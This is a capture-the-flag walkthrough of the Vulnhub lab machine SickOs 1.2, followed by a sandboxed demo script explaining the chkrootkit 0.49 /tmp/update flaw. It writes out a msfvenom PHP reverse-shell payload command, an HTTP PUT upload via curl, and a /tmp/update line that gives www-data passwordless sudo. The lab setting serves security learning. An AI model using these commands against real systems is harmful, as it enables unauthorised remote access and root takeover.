Another day, another CTF (capture the flag). If you have no projects on the go, you had better sharpen your skills by playing CTFs :p. This time it's SickOs:1.2 from Vulnhub.

1. Service Discovery

We start off by using nmap to scan all TCP ports.


Two TCP ports are open, 22 and 80, and there is nothing interesting on SSH. Usually I proceed to scan UDP as well, but I was too lazy this time; I wanted to see how fast I could finish this.

2. Enumeration

Nothing interesting on port 22, so let's jump over and see what is on port 80.

2.2. Port 80 HTTP

Let's take a look at port 80. We start with Nikto.


Nothing special here, so let's see it from the web browser.


All I see is the dude from The Matrix. Alright, I thought so too, Neo. Next we fire up DirBuster.


I can see that there is a directory called test, so let's enumerate it further.


Very nice, it looks like I can upload files to this directory: it accepts HTTP PUT, which is what curl's --upload-file sends. I'll upload a msfvenom payload, generated with this command:

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > tai.php

Next, upload the file tai.php using curl (I love curl):

curl --upload-file tai.php -0 --http1.0

and the file is uploaded successfully.


Do not pay attention to the other files; those are my experiments. It took me a while to figure out that the reverse shell only works on port 443 😀 (which suggests the target's outbound traffic is filtered, something worth remembering whenever a handler never receives a connection).

3. Exploitation

The next step is to set up a multi/handler listener in Metasploit and then browse to the uploaded file.


We have Meterpreter. We drop down into a shell, but unfortunately it only has the limited privileges of www-data, so we need to escalate to root. Let's enumerate further from here.


We can see that the target machine is running Ubuntu Linux with a 3.11 kernel, along with a fancy banner. As usual at this point, I upload and run linuxprivchecker.py; the complete result can be seen here.

After hours of searching for a vulnerability and some more enumeration, I found that the target machine is running chkrootkit version 0.49, which is vulnerable to a local privilege escalation (CVE-2014-0476): an unquoted variable in its slapper() check makes it execute a file named /tmp/update if one exists. After checking the scheduled cron jobs I can see that chkrootkit runs daily, as root, so anyone who can write to /tmp gets root. The next step is to run this command:


echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

chkrootkit runs /tmp/update through the shell, so the file also needs its execute bit set (chmod +x /tmp/update), otherwise the cron run fails with "permission denied" instead of running it. The chmod 440 at the end of the payload matters too: sudo refuses to read a sudoers file with the wrong mode. After several minutes I ran sudo su for root privileges


and captured the flag, which is located in the /root directory.
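To see exactly why a file called /tmp/update gets executed, here is an added example (my own code, not part of the original write-up and not chkrootkit's source) that replays the offending shell construct inside a throwaway directory standing in for /tmp, next to the quoted form that fixes it, plus a small version check. The sandbox path, the marker file and the function names are assumptions made for this demo.

```shell
#!/bin/sh
# Added example, not from the original write-up or from chkrootkit.
# chkrootkit < 0.50 (CVE-2014-0476) had, in its slapper() check, a loop over
# suspicious paths that included /tmp/update, collecting matches with:
#
#     file_port=$file_port $i
#
# With $file_port empty the shell reads that line as "assignment, then
# command", so $i is executed. When chkrootkit runs from a root cron job,
# whatever sits in /tmp/update runs as root. Everything below stays inside
# SANDBOX, a throwaway directory that stands in for /tmp (demo assumption).

SANDBOX=$(mktemp -d)

# Returns 0 (true) when the version printed by "chkrootkit -V" is below 0.50.
chkrootkit_version_vulnerable() {
    major=${1%%.*}
    minor=${1#*.}
    minor=${minor%%[!0-9]*}        # tolerate suffixes such as "0.49a"
    [ "$major" -eq 0 ] && [ "$minor" -lt 50 ]
}

# Stand-in for an attacker's /tmp/update: a script that only drops a marker.
# It must be executable, exactly like the real payload, or the shell fails
# with "permission denied" instead of running it.
make_payload() {
    rm -f "$SANDBOX/marker"
    printf '#!/bin/sh\necho ran > "%s/marker"\n' "$SANDBOX" > "$SANDBOX/update"
    chmod +x "$SANDBOX/update"
}

# True if the stand-in payload was executed.
payload_ran() { [ -f "$SANDBOX/marker" ]; }

# The vulnerable construct, as in chkrootkit 0.49.
slapper_vulnerable() {
    file_port=
    for i in "$SANDBOX/.bugtraq" "$SANDBOX/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i    # BUG: unquoted, so $i is run as a command
        fi
    done
}

# The corrected construct, as in chkrootkit 0.50: quoting turns the line back
# into a plain string assignment; the collected list is printed for inspection.
slapper_fixed() {
    file_port=
    for i in "$SANDBOX/.bugtraq" "$SANDBOX/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s\n' "$file_port"
}

# Demo run: the unquoted form executes the payload, the quoted form does not.
make_payload
slapper_vulnerable
if payload_ran; then
    echo "unquoted form: $SANDBOX/update was executed"
fi
make_payload
slapper_fixed >/dev/null
if payload_ran; then
    echo "quoted form: payload executed (unexpected)"
else
    echo "quoted form: payload only recorded as a path"
fi
rm -rf "$SANDBOX"
```

Run it with sh. On a real target the equivalent check is chkrootkit -V together with a look at the cron directories for when and as whom it runs; the sandbox also shows why the payload file must carry the execute bit, since the shell is executing it directly rather than sourcing it.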



4. Conclusion

Nice VM, I learnt some new techniques. Thanks D4rk36 and Vulnhub!